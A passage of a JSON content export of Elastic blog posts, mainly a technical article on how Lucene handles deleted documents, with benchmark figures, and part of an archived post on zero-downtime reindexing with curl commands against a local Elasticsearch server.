ingestion","updated_at":"2023-11-06T20:37:20.943Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:33:19.173Z","user":"blt4b2e1169881270a8"}}],"tags_use_case":[{"_version":3,"locale":"en-us","uid":"blt10eb11313dc454f1","ACL":{},"created_at":"2020-06-17T03:30:26.497Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"enterprise-search","label_l10n":"Search","tags":[],"title":"Search","updated_at":"2023-07-19T16:04:51.718Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.232Z","user":"blt4b2e1169881270a8"}}],"thumbnail_image":{"_version":1,"is_dir":false,"uid":"blte1e7f2a04c9c9f42","ACL":{},"content_type":"image/jpeg","created_at":"2021-02-08T19:24:07.826Z","created_by":"bltea6cbb86fea188be","file_size":"150721","filename":"blog-thumbnail-app-search-web-crawler.jpg","parent_uid":"blta8bbe6455dcfdb35","tags":[],"title":"blog-thumbnail-app-search-web-crawler.jpg","updated_at":"2022-02-11T21:03:29.215Z","updated_by":"bltea6cbb86fea188be","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-24T17:27:39.669Z","user":"blt36e890d06c5ec32c"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blte1e7f2a04c9c9f42/60218fd7f4a7946af033734b/blog-thumbnail-app-search-web-crawler.jpg"},"title":"Introducing the Elastic App Search web crawler","title_l10n":"Introducing the Elastic App Search web crawler","updated_at":"2024-09-12T19:57:13.690Z","updated_by":"blt3044324473ef223b70bc674c","url":"/blog/introducing-elastic-app-search-web-crawler","versions":[],"publish_details":{"time":"2024-09-12T20:00:26.144Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt40a51afcde7603d8","_version":3,"locale":"en-us","ACL":{},"abstract_l10n":"","author":["blt3141d03899991d14"],"body_l10n":"\u003cp\u003eWhen a document is deleted or updated (= delete + add), \u003ca href=\"http://lucene.apache.org\"\u003eApache Lucene\u003c/a\u003e simply marks a bit in a per-segment bitset to record that the document is deleted. All subsequent searches simply skip any deleted documents.\u003c/p\u003e\n\u003cp\u003eIt is not until \u003ca href=\"http://blog.mikemccandless.com/2011/02/visualizing-lucenes-segment-merges.html\"\u003esegments are merged\u003c/a\u003e that the bytes consumed by deleted documents are reclaimed. Likewise, any terms that occur only in deleted documents (ghost terms) are not removed until merge. This approach is necessary because it would otherwise be far too costly to update Lucene's write-once index data structures and aggregate statistics for every document deletion, but it has some implications:\u003c/p\u003e\n\u003cul\u003e\n \u003cli\u003eDeleted documents tie up disk space in the index.\u003c/li\u003e\n \u003cli\u003eIn-memory per-document data structures, such as norms or field data, will still consume RAM for deleted documents.\u003c/li\u003e\n \u003cli\u003eSearch throughput is lower, since each search must check the deleted bitset for every potential hit. More on this below.\u003c/li\u003e\n \u003cli\u003eAggregate term statistics, used for query scoring, will still reflect deleted terms and documents. When a merge completes, the term statistics will suddenly jump closer to their true values, changing hit scores. In practice this impact is minor, unless the deleted documents had divergent statistics from the rest of the index.\u003c/li\u003e\n \u003cli\u003eA deleted document ties up a document ID from the maximum 2.1 B documents for a single shard. If your shard is riding close to that limit (not recommended!) this could matter.\u003c/li\u003e\n \u003cli\u003eFuzzy queries can have slightly different results, because they may match ghost terms.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eMerging Reclaims Deleted Documents\u003c/h2\u003e\n\u003cp\u003eLucene's default merge policy, \u003ca href=\"http://blog.mikemccandless.com/2011/02/visualizing-lucenes-segment-merges.html\"\u003eTieredMergePolicy\u003c/a\u003e, already prefers merges that would reclaim more deleted documents, other factors being equal. Over time this means segments with more deletions will be targeted for merging. While it does have a tunable setting (\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/index-modules-merge.html\"\u003eindex.merge.policy.reclaim_deletes_weight\u003c/a\u003e) to control how aggressively it targets deletions, it is dangerous to increase this too much otherwise it could select poor (costly) merge choices, dwarfing any gains from slightly fewer deleted documents.\u003c/p\u003e\n\u003cp\u003eI was curious how effective its defaults are in practice, so I ran a simple worst-case indexing test. First, I built an initial index with 100 M added documents (no deletions) derived from \u003ca href=\"http://wikipedia.org\"\u003eWikipedia's\u003c/a\u003e English export. Then I updated that index by forever randomly replacing an existing document (never adding a new document), so that every add also incurs a deletion.\u003c/p\u003e\n\u003cp\u003eThere was no pattern to the updates, such as favoring replacing older or newer documents. This is unrealistic, but it is a good worst case test because the deletes accumulate uniformly, in proportion to each segment's size. In real usage, certain segments (old or new) would accumulate deletions at a faster rate and thus be more quickly selected for merging.\u003c/p\u003e\n\u003cp\u003eI measured the percentage of deleted (but not yet merged away) documents over time, computed as maxDoc/numDocs - 1.0 (where numDocs is constant at 100 M in my test). The graph below shows an initial startup transient, when the percentage quickly rise from 0% to 45% at which point a couple of large merges complete and bring it back down. After that the deletions percentage hovers between 35% and 60%, with a sawtooth shape showing a sudden drop whenever varying sized merges finish. It looks somewhat like the stock market!\u003c/p\u003e\n\u003cp\u003e\u003cimg class=\"img-responsive\" src=\"https://api.contentstack.io/v2/assets/575e4d869e7a83165490ea31/download?uid=bltb4fbb3a7a8f22d8f?uid=bltb4fbb3a7a8f22d8f\" /\u003e\u003c/p\u003e\n\u003cp\u003eA maximum sized segment (default: 5 GB) will only be eligible for merging once it accumulates 50% deletions. If this is too slow for your usage, try decreasing that maximum (\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/index-modules-merge.html\"\u003eindex.merge.policy.max_merged_segment\u003c/a\u003e): this will result in a somewhat larger segment count, but the reclaiming should happen more quickly, especially when there is a pattern to the deletions.\u003c/p\u003e\n\u003ch2\u003eHow Do Deleted Documents Affect Search Performance?\u003c/h2\u003e\n\u003cp\u003eBecause deleted documents remain in the index, they must still be decoded from the postings lists and then skipped during searching, so there is added search cost. To test how much, I ran a search performance test for varying queries using the 100 M document index with no deletions as the baseline, and the same index with 50% deleted documents (i.e., 150 M documents with 50M deleted). Both indices were single-segment. Here are the results:\u003c/p\u003e\n\u003cdiv class=\"table-wrapper\"\u003e\n \u003ctable\u003e\n \u003ctbody\u003e\n \u003ctr\u003e\n \u003cth\u003eQuery \u003c/th\u003e\n \u003cth align=\"right\"\u003eQPS\u0026nbsp;\u0026nbsp;\u0026nbsp;\u0026nbsp; \u003c/th\u003e\n \u003cth align=\"right\"\u003eStdDev\u0026nbsp;\u0026nbsp;\u0026nbsp;\u0026nbsp; \u003c/th\u003e\n \u003cth align=\"right\"\u003eQPS with deletes\u0026nbsp;\u0026nbsp;\u0026nbsp;\u0026nbsp; \u003c/th\u003e\n \u003cth align=\"right\"\u003eStdDev with deletes\u0026nbsp;\u0026nbsp;\u0026nbsp;\u0026nbsp; \u003c/th\u003e\n \u003cth align=\"right\"\u003e% change \u003c/th\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003eInt Range query \u003c/td\u003e\n \u003ctd\u003e1.2 \u003c/td\u003e\n \u003ctd\u003e(5.1%) \u003c/td\u003e\n \u003ctd\u003e0.6 \u003c/td\u003e\n \u003ctd\u003e(1.8%) \u003c/td\u003e\n \u003ctd\u003e\u003cspan style=\"color: red;\"\u003e46%\u003c/span\u003e \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003ePrefix query \u003c/td\u003e\n \u003ctd\u003e5.7 \u003c/td\u003e\n \u003ctd\u003e(5.0%) \u003c/td\u003e\n \u003ctd\u003e3.4 \u003c/td\u003e\n \u003ctd\u003e(2.3%) \u003c/td\u003e\n \u003ctd\u003e\u003cspan style=\"color: red;\"\u003e41%\u003c/span\u003e \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003eWildcard \u003c/td\u003e\n \u003ctd\u003e5.3 \u003c/td\u003e\n \u003ctd\u003e(4.4%) \u003c/td\u003e\n \u003ctd\u003e3.2 \u003c/td\u003e\n \u003ctd\u003e(2.2%) \u003c/td\u003e\n \u003ctd\u003e\u003cspan style=\"color: red;\"\u003e39%\u003c/span\u003e \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003eAnd High+Low \u003c/td\u003e\n \u003ctd\u003e91.1 \u003c/td\u003e\n \u003ctd\u003e(2.0%) \u003c/td\u003e\n \u003ctd\u003e59.5 \u003c/td\u003e\n \u003ctd\u003e(2.1%) \u003c/td\u003e\n \u003ctd\u003e\u003cspan style=\"color: red;\"\u003e34%\u003c/span\u003e \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003eMed Phrase \u003c/td\u003e\n \u003ctd\u003e36.2 \u003c/td\u003e\n \u003ctd\u003e(2.8%) \u003c/td\u003e\n \u003ctd\u003e24.4 \u003c/td\u003e\n \u003ctd\u003e(1.3%) \u003c/td\u003e\n \u003ctd\u003e\u003cspan style=\"color: red;\"\u003e32%\u003c/span\u003e \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003eAnd High+Med \u003c/td\u003e\n \u003ctd\u003e16.6 \u003c/td\u003e\n \u003ctd\u003e(1.5%) \u003c/td\u003e\n \u003ctd\u003e11.2 \u003c/td\u003e\n \u003ctd\u003e(1.0%) \u003c/td\u003e\n \u003ctd\u003e\u003cspan style=\"color: red;\"\u003e32%\u003c/span\u003e \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003eMed Term \u003c/td\u003e\n \u003ctd\u003e12.6 \u003c/td\u003e\n \u003ctd\u003e(2.6%) \u003c/td\u003e\n \u003ctd\u003e8.6 \u003c/td\u003e\n \u003ctd\u003e(6.1%) \u003c/td\u003e\n \u003ctd\u003e\u003cspan style=\"color: red;\"\u003e31%\u003c/span\u003e \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003eAnd High+High \u003c/td\u003e\n \u003ctd\u003e4.4 \u003c/td\u003e\n \u003ctd\u003e(1.3%) \u003c/td\u003e\n \u003ctd\u003e3.0 \u003c/td\u003e\n \u003ctd\u003e(0.9%) \u003c/td\u003e\n \u003ctd\u003e\u003cspan style=\"color: red;\"\u003e31%\u003c/span\u003e \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003eHigh Term \u003c/td\u003e\n \u003ctd\u003e6.1 \u003c/td\u003e\n \u003ctd\u003e(2.8%) \u003c/td\u003e\n \u003ctd\u003e4.2 \u003c/td\u003e\n \u003ctd\u003e(6.1%) \u003c/td\u003e\n \u003ctd\u003e\u003cspan style=\"color: red;\"\u003e31%\u003c/span\u003e \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003eFuzzy1 \u003c/td\u003e\n \u003ctd\u003e33.5 \u003c/td\u003e\n \u003ctd\u003e(12.7%) \u003c/td\u003e\n \u003ctd\u003e23.6 \u003c/td\u003e\n \u003ctd\u003e(8.1%) \u003c/td\u003e\n \u003ctd\u003e\u003cspan style=\"color: red;\"\u003e29%\u003c/span\u003e \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003eLow Term \u003c/td\u003e\n \u003ctd\u003e61.1 \u003c/td\u003e\n \u003ctd\u003e(6.3%) \u003c/td\u003e\n \u003ctd\u003e43.6 \u003c/td\u003e\n \u003ctd\u003e(7.1%) \u003c/td\u003e\n \u003ctd\u003e\u003cspan style=\"color: red;\"\u003e28%\u003c/span\u003e \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003eMed Sloppy Phrase \u003c/td\u003e\n \u003ctd\u003e7.3 \u003c/td\u003e\n \u003ctd\u003e(4.4%) \u003c/td\u003e\n \u003ctd\u003e5.2 \u003c/td\u003e\n \u003ctd\u003e(1.7%) \u003c/td\u003e\n \u003ctd\u003e\u003cspan style=\"color: red;\"\u003e28%\u003c/span\u003e \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003eFuzzy2 \u003c/td\u003e\n \u003ctd\u003e33.7 \u003c/td\u003e\n \u003ctd\u003e(13.3%) \u003c/td\u003e\n \u003ctd\u003e24.2 \u003c/td\u003e\n \u003ctd\u003e(8.5%) \u003c/td\u003e\n \u003ctd\u003e\u003cspan style=\"color: red;\"\u003e28%\u003c/span\u003e \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003eOr High+Med \u003c/td\u003e\n \u003ctd\u003e6.8 \u003c/td\u003e\n \u003ctd\u003e(5.4%) \u003c/td\u003e\n \u003ctd\u003e4.9 \u003c/td\u003e\n \u003ctd\u003e(4.5%) \u003c/td\u003e\n \u003ctd\u003e\u003cspan style=\"color: red;\"\u003e27%\u003c/span\u003e \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003eOr High+Low \u003c/td\u003e\n \u003ctd\u003e5.7 \u003c/td\u003e\n \u003ctd\u003e(5.6%) \u003c/td\u003e\n \u003ctd\u003e4.1 \u003c/td\u003e\n \u003ctd\u003e(4.7%) \u003c/td\u003e\n \u003ctd\u003e\u003cspan style=\"color: red;\"\u003e27%\u003c/span\u003e \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003eLow Phrase \u003c/td\u003e\n \u003ctd\u003e8.3 \u003c/td\u003e\n \u003ctd\u003e(2.9%) \u003c/td\u003e\n \u003ctd\u003e6.0 \u003c/td\u003e\n \u003ctd\u003e(1.6%) \u003c/td\u003e\n \u003ctd\u003e\u003cspan style=\"color: red;\"\u003e27%\u003c/span\u003e \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003eOr High+High \u003c/td\u003e\n \u003ctd\u003e1.5 \u003c/td\u003e\n \u003ctd\u003e(5.5%) \u003c/td\u003e\n \u003ctd\u003e1.1 \u003c/td\u003e\n \u003ctd\u003e(4.7%) \u003c/td\u003e\n \u003ctd\u003e\u003cspan style=\"color: red;\"\u003e26%\u003c/span\u003e \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003eHigh Phrase \u003c/td\u003e\n \u003ctd\u003e2.1 \u003c/td\u003e\n \u003ctd\u003e(5.1%) \u003c/td\u003e\n \u003ctd\u003e1.5 \u003c/td\u003e\n \u003ctd\u003e(2.8%) \u003c/td\u003e\n \u003ctd\u003e\u003cspan style=\"color: red;\"\u003e25%\u003c/span\u003e \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003eMed Span Near \u003c/td\u003e\n \u003ctd\u003e15.8 \u003c/td\u003e\n \u003ctd\u003e(9.3%) \u003c/td\u003e\n \u003ctd\u003e11.8 \u003c/td\u003e\n \u003ctd\u003e(3.8%) \u003c/td\u003e\n \u003ctd\u003e\u003cspan style=\"color: red;\"\u003e25%\u003c/span\u003e \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003eLow Sloppy Phrase \u003c/td\u003e\n \u003ctd\u003e2.7 \u003c/td\u003e\n \u003ctd\u003e(3.2%) \u003c/td\u003e\n \u003ctd\u003e2.0 \u003c/td\u003e\n \u003ctd\u003e(1.9%) \u003c/td\u003e\n \u003ctd\u003e\u003cspan style=\"color: red;\"\u003e25%\u003c/span\u003e \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003eLow Span Near \u003c/td\u003e\n \u003ctd\u003e3.9 \u003c/td\u003e\n \u003ctd\u003e(4.8%) \u003c/td\u003e\n \u003ctd\u003e3.2 \u003c/td\u003e\n \u003ctd\u003e(2.7%) \u003c/td\u003e\n \u003ctd\u003e\u003cspan style=\"color: red;\"\u003e18%\u003c/span\u003e \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003eHigh Sloppy Phrase\u0026nbsp;\u0026nbsp;\u0026nbsp;\u0026nbsp; \u003c/td\u003e\n \u003ctd\u003e2.8 \u003c/td\u003e\n \u003ctd\u003e(5.9%) \u003c/td\u003e\n \u003ctd\u003e2.3 \u003c/td\u003e\n \u003ctd\u003e(4.6%) \u003c/td\u003e\n \u003ctd\u003e\u003cspan style=\"color: red;\"\u003e18%\u003c/span\u003e \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003eHigh Span Near \u003c/td\u003e\n \u003ctd\u003e2.4 \u003c/td\u003e\n \u003ctd\u003e(4.4%) \u003c/td\u003e\n \u003ctd\u003e2.0 \u003c/td\u003e\n \u003ctd\u003e(2.5%) \u003c/td\u003e\n \u003ctd\u003e\u003cspan style=\"color: red;\"\u003e18%\u003c/span\u003e\u003c/td\u003e\n \u003c/tr\u003e\n \u003c/tbody\u003e\n \u003c/table\u003e\n\u003c/div\u003e\n\u003cp\u003eThe bad news is there is clearly a non-trivial performance cost to deleted documents, and this is something we can work to reduce over time (patches welcome!). The good news is the cost is typically quite a bit lower than the percentage deletes (50% in this test) because these documents are filtered out at a low level before any of the costly query matchers and scorers see them. The more costly queries (Phrase, Span) tend to see the lowest impact, which is also good because it is the slow queries that determine node capacity for most applications.\u003c/p\u003e\n\u003ch2\u003eHow About Expunge Deletes?\u003c/h2\u003e\n\u003cp\u003eElasticsearch's \u003ca href=\"/guide/en/elasticsearch/reference/2.4/indices-optimize.html\"\u003eoptimize API accepts an only_expunge_deletes\u0026nbsp;flag\u003c/a\u003e, which in turn calls Lucene's IndexWriter.expungeDeletes method. While this will forcefully reclaim space from deleted documents, this operation is very costly: under the hood, it forces merging of any segments that have more than 10% (by default) deletions. Use it sparingly: it is better to let Lucene's natural merging handle reclaiming deletions.\u003c/p\u003e\n\u003cp\u003eHowever, if you have an index which receives only deletions (never an added or updated document) then beware that Lucene in this case currently fails to kick off any merges. This is a \u003ca href=\"https://issues.apache.org/jira/browse/LUCENE-6166\"\u003eknown issue\u003c/a\u003e that has been fixed, and will be fixed in Lucene 5.0 and Elasticsearch 2.0. In the meantime, this is an appropriate time to periodically expunge deletes!\u003c/p\u003e\n\u003ch2\u003eTime-Based Indices\u003c/h2\u003e\n\u003ctable style=\"background: #FFFFD2;\"\u003e\n \u003ctbody\u003e\n \u003ctr\u003e\n \u003ctd\u003eEditor's Note (June 12, 2018): As you read, please note that the content in this section is relevant for\u0026nbsp;Elasticsearch 2.4. With\u0026nbsp;Elasticsearch 5.x\u0026nbsp;\u003ca href=\"/guide/en/elasticsearch/reference/5.0/breaking_50_mapping_changes.html\"\u003ethe ttl field was removed\u003c/a\u003e.\u0026nbsp;\u003c/td\u003e\n \u003c/tr\u003e\n \u003c/tbody\u003e\n\u003c/table\u003e\n\u003cp\u003eElasticsearch \u003ca href=\"/guide/en/elasticsearch/reference/2.4/mapping-ttl-field.html\"\u003elets you specify time-to-live\u003c/a\u003e for each added document, which means after that time has passed, the document is automatically deleted. This is very useful for certain applications, but it will cause heavy deletions over time.\u003c/p\u003e\n\u003cp\u003eOne simple optimization Lucene uses, that may help in such use cases, is to simply drop a segment once it has accumulated 100% deleted documents, without waiting for it to be merged away. The optimization is somewhat fragile since it only applies when all documents in the segment were deleted, but it is very effective since it is obviously extremely fast and happens before merging. Unfortunately, because TieredMergePolicy picks out of order merges, it reduces how frequently the optimization can apply in time-to-live indices.\u003c/p\u003e\n\u003cp\u003eIf you need to further improve indexing performance with time-to-live documents consider using time-based indices instead, such as one index per day or per week: dropping an entire index is quite a bit more efficient than having Lucene remove a subset of documents. If you are concerned about the loss of granularity with this approach, just add a filter to the request to remove the oldest results from the oldest index.\u003c/p\u003e\n\u003cp\u003eIf you are curious about how many deleted documents are in your shards, use the \u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/indices-segments.html\"\u003eindices segments API\u003c/a\u003e to find out. Just don't read too much into it. Overall, besides perhaps decreasing the maximum segment size, it is best to leave Lucene's defaults as-is and not fret too much about when deletes are reclaimed.\u003c/p\u003e","category":[{"uid":"blte5cc8450a098ce5e","_version":4,"locale":"en-us","ACL":{},"created_at":"2023-11-02T21:51:15.490Z","created_by":"blt3044324473ef223b70bc674c","key":"how-to","label_l10n":"How to","tags":[],"title":"How to","updated_at":"2024-05-10T13:44:25.495Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"time":"2024-05-10T13:44:53.353Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}}],"created_at":"2019-04-01T13:12:25.397Z","created_by":"sys_blt57a423112de8a853","disclaimer":[],"full_bleed_image":null,"markdown_l10n":"","product":["elasticsearch","elastic stack"],"publish_date":"2015-01-30T20:06:02.000Z","seo":{"seo_title_l10n":"","seo_description_l10n":"","og_markup":{"facebook_profile_id":""},"canonical_tag":"","noindex":false},"tags":[],"tags_campaigns":[],"tags_culture":[],"tags_elastic_stack":[{"_version":3,"locale":"en-us","uid":"blta3fd0168b354a680","ACL":{},"created_at":"2023-11-06T21:50:30.740Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"elk-elastic-stack","label_l10n":"ELK/Elastic Stack","tags":[],"title":"ELK/Elastic Stack","updated_at":"2024-03-12T21:21:08.589Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-03-12T21:21:14.279Z","user":"blt3044324473ef223b70bc674c"}},{"_version":1,"locale":"en-us","uid":"blt3d820a0eae1c9158","ACL":{},"created_at":"2020-06-17T03:35:53.368Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"elasticsearch","label_l10n":"Elasticsearch","tags":[],"title":"Elasticsearch","updated_at":"2020-06-17T03:35:53.368Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:20.290Z","user":"blt4b2e1169881270a8"}}],"tags_event_type":[],"tags_industry":[],"tags_partner":[],"tags_role":[],"tags_stage":[],"tags_topic":[{"_version":1,"locale":"en-us","uid":"blt405e99573a94e858","ACL":{},"created_at":"2023-11-06T20:37:33.009Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"data-loss-prevention","label_l10n":"Data Loss Prevention (DLP)","tags":[],"title":"Data Loss Prevention (DLP)","updated_at":"2023-11-06T20:37:33.009Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:40:40.892Z","user":"blt06083bb707628f5c"}}],"tags_use_case":[{"_version":3,"locale":"en-us","uid":"blt10eb11313dc454f1","ACL":{},"created_at":"2020-06-17T03:30:26.497Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"enterprise-search","label_l10n":"Search","tags":[],"title":"Search","updated_at":"2023-07-19T16:04:51.718Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.232Z","user":"blt4b2e1169881270a8"}}],"thumbnail_image":null,"title":"Lucene's Handling of Deleted Documents","title_l10n":"Lucene's Handling of Deleted Documents","updated_at":"2024-09-12T19:56:24.067Z","updated_by":"blt3044324473ef223b70bc674c","url":"/blog/lucenes-handling-of-deleted-documents","versions":[],"publish_details":{"time":"2024-09-12T19:56:28.462Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt589302fd49b45885","_version":4,"locale":"en-us","ACL":{},"abstract_l10n":"","author":["blta14bb0509c1528d3"],"body_l10n":"\u003csection id=\"post_content\"\u003e\n \u003carticle\u003e\n \u003ctable style=\"background: #FFFFD2;\"\u003e\n \u003ctbody\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n \u003cp\u003e\u003cstrong\u003eEditor's Note\u0026nbsp;(May 1, 2017):\u003c/strong\u003e\u003cem\u003e This blog was originally published several major versions of Elasticsearch\u0026nbsp;ago. \u0026nbsp;Since then, new mappings have been made available, but more importantly, new features like the \u003c/em\u003e\u003ca href=\"/blog/reindex-is-coming\"\u003e\u003cem\u003eReindex API\u003c/em\u003e\u003c/a\u003e\u003cem\u003e have made tasks like this\u0026nbsp;substantially easier. \u0026nbsp;The below\u0026nbsp;post remains for archival purposes, but it's recommended you read over the linked reindex blog for a more modern approach to the reindex challenge.\u003c/em\u003e\u003cbr /\u003e\u003c/p\u003e\n \u003cp\u003e\u003cdel\u003e\u003cstrong\u003eUpdate November 2, 2015:\u0026nbsp;\u003c/strong\u003e\u003c/del\u003e\u003cdel\u003e\u003cem\u003eMake sure to check out the updates with \u003c/em\u003e\u003c/del\u003e\u003ca href=\"https://www.elastic.co/blog/elasticsearch-2-0-0-released\"\u003e\u003cdel\u003e\u003cem\u003eElasticsearch mappings introduced in the 2.0 release\u003c/em\u003e\u003c/del\u003e\u003c/a\u003e\u003cdel\u003e\u003cem\u003e.\u003c/em\u003e\u003c/del\u003e\u003cbr /\u003e\u003c/p\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003c/tbody\u003e\n \u003c/table\u003e\n \u003cp\u003eA developer I know sent me a tweet saying:\u003c/p\u003e\n \u003cp style=\"padding-left: 30px;\"\u003e\u003cem\u003eMy biggest problem with using Elastic Search as my model is that I have to reindex whenever I make a schema change. With the size of the data sets that takes a long ass time, and that results in a lot of down time for me. Too much for most applications.\u003c/em\u003e\u003c/p\u003e\n \u003cp\u003eIt is quite possible to make schema/mapping changes with zero downtime, but there are too many options available to explain in a tweet, hence this blogpost.\u003c/p\u003e\n \u003ch2 id=\"_the_problem_8201_8212_8201_why_you_can_8217_t_change_mappings\"\u003eThe problem — Why you can't change mappings\u003c/h2\u003e\n \u003cp\u003eYou can only find that which is stored in your index. In order to make your data searchable, your database needs to know what type of data each field contains and how it should be indexed. If you switch a field type from e.g. a string to a date, all of the data for that field that you already have indexed becomes useless. One way or another, you need to reindex that field.\u003c/p\u003e\n \u003cp\u003eThis applies not just to Elasticsearch, but to any database that uses indices for searching. And if it isn't using indices then it is sacrificing speed for flexibility.\u003c/p\u003e\n \u003cp\u003eElasticsearch (and Lucene) stores its indices in immutable \u003cem\u003esegments\u003c/em\u003e — each segment is a “mini\" inverted index. These segments are never updated in place. Updating a document actually creates a new document and marks the old document as deleted. As you add more documents (or update existing documents), new segments are created. A merge process runs in the background merging several smaller segments into a new big segment, after which the old segments are removed entirely.\u003c/p\u003e\n \u003cp\u003eTypically, an index in Elasticsearch will contain documents of different types. Each _type has its own schema or \u003cem\u003emapping\u003c/em\u003e. A single segment may contain documents of any type. So, if you want to change the field definition for a single field in a single type, you have little option but to reindex all of the documents in your index.\u003c/p\u003e\n \u003ch2 id=\"_adding_fields_is_free\"\u003eAdding fields is free\u003c/h2\u003e\n \u003cp\u003eA segment only contains indices for fields that actually exist in the documents for that segment. This means that you can add new fields for free, using the \u003ca href=\"https://www.elastic.co/guide/reference/api/admin-indices-put-mapping/\"\u003eput_mapping API\u003c/a\u003e. There is no need to reindex.\u003c/p\u003e\n \u003ch2 id=\"_reindexing_your_data\"\u003eReindexing your data\u003c/h2\u003e\n \u003cp\u003eThe process for reindexing your data is quite simple. First, create a new index with the new mapping and settings:\u003c/p\u003e\u003cpre class=\"prettyprint \"\u003ecurl -XPUT localhost:9200/new_index -H 'Content-Type: application/json' -d '\u003cbr /\u003e{\u003cbr /\u003e \"mappings\": {\u003cbr /\u003e \"my_type\": { ... new mapping definition ...}\u003cbr /\u003e }\u003cbr /\u003e}\u003cbr /\u003e'\u003cbr /\u003e\u003c/pre\u003e\n \u003cp\u003eThen, pull the documents in from your old index, using a \u003ca href=\"https://www.elastic.co/guide/reference/api/search/scroll/\"\u003e\u003cem\u003escrolled search\u003c/em\u003e\u003c/a\u003e and index them into the new index using the \u003ca href=\"https://www.elastic.co/guide/reference/api/bulk/\"\u003ebulk API\u003c/a\u003e. Many of the client APIs provide a reindex() method which will do all of this for you. Once you are done, you can delete the old index.\u003c/p\u003e\n \u003cp\u003e\u003cstrong\u003eNote:\u003c/strong\u003e make sure that you include \u003ca href=\"https://www.elastic.co/guide/reference/api/search/search-type.html\"\u003esearch_type=scan\u003c/a\u003e in your search request. This disables sorting and makes “deep paging\" efficient.\u003c/p\u003e\n \u003cp\u003eThe problem with this approach is that the index name changes, which means that you need to change your application to use the new index name\u003c/p\u003e\n \u003ch2 id=\"_reindexing_your_data_with_zero_downtime\"\u003eReindexing your data with zero downtime\u003c/h2\u003e\n \u003cp\u003eIndex aliases give us the flexibility to reindex data in the background, making the change completely transparent to our application. An \u003ca href=\"https://www.elastic.co/guide/reference/api/admin-indices-aliases/\"\u003ealias\u003c/a\u003e is like a symbolic link which can point to one or more real indices.\u003c/p\u003e\n \u003cp\u003eThe typical workflow is as follows. First, create an index, appending a version or timestamp to the name:\u003c/p\u003e\u003cpre class=\"prettyprint \"\u003ecurl -XPUT localhost:9200/my_index_v1 -H 'Content-Type: application/json' -d '\u003cbr /\u003e{ ... mappings ... }\u003cbr /\u003e'\u003cbr /\u003e\u003c/pre\u003e\n \u003cp\u003eCreate an alias which points to the index:\u003c/p\u003e\u003cpre class=\"prettyprint \"\u003ecurl -XPOST localhost:9200/_aliases -H 'Content-Type: application/json' -d '\u003cbr /\u003e{\u003cbr /\u003e \"actions\": [\u003cbr /\u003e { \"add\": {\u003cbr /\u003e \"alias\": \"my_index\",\u003cbr /\u003e \"index\": \"my_index_v1\"\u003cbr /\u003e }}\u003cbr /\u003e ]\u003cbr /\u003e}\u003cbr 